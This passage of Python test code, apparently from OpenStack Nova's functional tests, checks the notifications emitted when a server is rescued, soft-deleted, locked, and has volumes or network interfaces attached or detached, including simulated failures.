# Both "rescue" and "unrescue" notification asserts are made here
# rescue notification asserts
post = {
"rescue": {
"rescue_image_ref": 'a2459075-d96c-40d5-893e-577ff92e721c'
}
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'RESCUE')
# 0. instance.rescue.start
# 1. instance.exists
# 2. instance.rescue.end
self.assertEqual(3, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-rescue-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-rescue-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self.notifier.reset()
# Unrescue notification asserts:
post = {
'unrescue': None
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-unrescue-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-unrescue-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_soft_delete_server(self, server):
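# Soft delete the server and assert the soft_delete start/end
# notifications.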
self.flags(reclaim_instance_interval=30)
self.api.delete_server(server['id'])
self._wait_for_state_change(server, 'SOFT_DELETED')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-soft_delete-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-soft_delete-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.flags(reclaim_instance_interval=0)
# Leave the instance in a normal, active state.
self.api.post_server_action(server['id'], {'restore': {}})
def _test_attach_volume_error(self, server):
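# A volume attach failing on the Cinder side should emit
# volume_attach.start followed by volume_attach.error with the
# fault traceback.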
def attach_volume(*args, **kwargs):
raise exception.CinderConnectionFailed(
reason="Connection timed out")
# Override the fixture's default implementation of this with our
# error-generating version.
cinder.API.attachment_update.side_effect = attach_volume
post = {"volumeAttachment": {"volumeId": self.cinder.SWAP_NEW_VOL}}
self.api.post_server_volume(server['id'], post)
self._wait_for_notification('instance.volume_attach.error')
block_devices = [
# Added by default at boot
{'nova_object.data': {'boot_index': None,
'delete_on_termination': False,
'tag': None,
'device_name': '/dev/sdb',
'volume_id': self.cinder.SWAP_OLD_VOL},
'nova_object.name': 'BlockDevicePayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.0'},
# The volume being attached right now
{'nova_object.data': {'boot_index': None,
'delete_on_termination': False,
'tag': None,
'device_name': '/dev/sdc',
'volume_id': self.cinder.SWAP_NEW_VOL},
'nova_object.name': 'BlockDevicePayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.0'}]
# 0. volume_attach-start
# 1. volume_attach-error
# 2. compute.exception
# We only rely on the first two notifications; in this case we don't
# care about the exception notification.
self.assertLessEqual(2, len(self.notifier.versioned_notifications))
self._verify_notification(
'instance-volume_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'block_devices': block_devices,
'volume_id': self.cinder.SWAP_NEW_VOL,
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
tb = self.notifier.versioned_notifications[1]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("CinderConnectionFailed:", tb)
self._verify_notification(
'instance-volume_attach-error',
replacements={
'reservation_id': server['reservation_id'],
'block_devices': block_devices,
'volume_id': self.cinder.SWAP_NEW_VOL,
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[1])
def _test_interface_attach_and_detach(self, server):
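# Attach then detach a network interface and assert the corresponding
# start/end notifications.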
post = {
'interfaceAttachment': {
'net_id': fixtures.NeutronFixture.network_1['id']
}
}
self.api.attach_interface(server['id'], post)
self._wait_for_notification('instance.interface_attach.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-interface_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-interface_attach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.notifier.reset()
self.assertEqual(0, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self.api.detach_interface(
server['id'],
fixtures.NeutronFixture.port_2['id'])
self._wait_for_notification('instance.interface_detach.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-interface_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-interface_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
@mock.patch('nova.virt.fake.SmallFakeDriver.attach_interface')
def _test_interface_attach_error(self, server, mock_driver):
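# An interface attach failing in the driver should emit
# interface_attach.start followed by interface_attach.error.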
def _unsuccessful_attach_interface(*args, **kwargs):
raise exception.InterfaceAttachFailed("dummy")
mock_driver.side_effect = _unsuccessful_attach_interface
post = {
'interfaceAttachment': {
'net_id': fixtures.NeutronFixture.network_1['id']
}
}
self.assertRaises(
client.OpenStackApiException,
self.api.attach_interface, server['id'], post)
self._wait_for_notification('instance.interface_attach.error')
# 0. instance.interface_attach.start
# 1. instance.interface_attach.error
# 2. compute.exception
self.assertLessEqual(2, len(self.notifier.versioned_notifications))
self._verify_notification(
'instance-interface_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
tb = self.notifier.versioned_notifications[1]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.InterfaceAttachFailed", tb)
self._verify_notification(
'instance-interface_attach-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[1])
def _test_lock_unlock_instance(self, server):
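# Lock then unlock the server and assert the lock/unlock notifications.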
self.api.post_server_action(server['id'], {'lock': {}})
self._wait_for_server_parameter(server, {'locked': True})
self.api.post_server_action(server['id'], {'unlock': {}})
self._wait_for_server_parameter(server, {'locked': False})
# Two versioned notifications are generated
# 0. instance-lock
# 1. instance-unlock
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-lock',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-unlock',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_lock_unlock_instance_with_reason(self, server):
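# Lock the server with a reason then unlock it; the lock notification
# sample should include the locked_reason.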
self.api.post_server_action(
server['id'], {'lock': {"locked_reason": "global warming"}})
self._wait_for_server_parameter(server, {'locked': True})
self.api.post_server_action(server['id'], {'unlock': {}})
self._wait_for_server_parameter(server, {'locked': False})
# Two versioned notifications are generated
# 0. instance-lock
# 1. instance-unlock
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-lock-with-reason',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-unlock',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])